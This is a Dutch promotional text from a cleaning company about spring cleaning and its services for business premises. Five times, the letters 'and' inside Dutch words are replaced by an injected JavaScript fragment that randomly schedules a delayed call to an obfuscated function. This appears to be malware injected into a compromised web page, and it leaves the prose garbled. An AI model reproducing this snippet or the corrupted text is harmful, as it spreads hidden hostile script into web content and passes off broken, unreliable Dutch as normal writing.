De correcte voorjaarsschoonmaak

Het voorjaar komt er weer aan. De natuur ontwaakt weer langzaam en de eerste voorjaarsbloemetjes komen weer tevoorschijn. Traditiegetrouw houdt Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and in deze tijd weer grote schoonmaak. Vanaf het moment dat de eerste zonnestralen het huis in kwamen en je opeens weer ieder stofdeeltje zag opwaaien, was het juiste moment aangebroken om het hele huis eens goed schoon te maken. Systematisch werd kamer voor kamer schoongemaakt.
Ook werden de gordijnen gewassen en het meubilair ging soms naar buiten om de vloeren goed te kunnen reinigen. Daarnaast werden alle kasten leeggeruimd en van binnen goed schoongemaakt en van buiten in de boenwas gezet. Nadat de kasten weer schoon op hun plaats stonden, werden de kamerdeuren gesopt, de ramen gewassen en de vloeren geschrobd. Dan konden de uitgeklopte kleden weer op de vloer, de overige meubels weer naar binnen en ook de gewassen en gestreken gordijnen voor het raam. Uit de slaapkamer werd ook het matras naar buiten gebracht, om deze goed met de mattenklopper uit te kloppen. Ook keuken, badkamer en toilet kregen een flinke schoonmaakbeurt.
Zo’n voorjaarsschoonmaak is een goed moment om een huis of pandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and eens flink onder handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden te nemen. Op zo’n manier kun je met een fris gevoel het nieuwe seizoen in. Dat vinden we bij Correct Schoonmaak ook. Het voorjaar vraagt om een frisse uitstraling van uw bedrijfspandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and. Daarbij wordt geen onderdeel vergeten. Denk maar aan het schoonmaken van het houtwerk, de damwandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and en overheaddeuren. Maar ook het schoonmaken van trespa beplating en het reinigen van de buitengevel doen wij graag. Ook de buitenomgeving vergeten we niet. De buitenstop of parkeerplaats reinigen wij graag. Dit is immers het visitekaartje van uw bedrijf of instelling. Wilt u met Correct Groep schoon het nieuwe voorjaar in? Maak kennis met ons. Want nieuwe bezems vegen schoon. We gaan voortvarend aan de slag en hebben er nooit schoon genoeg van. Informeer eens naar de mogelijkheden of laat vrijblijvend een offerte opstellen.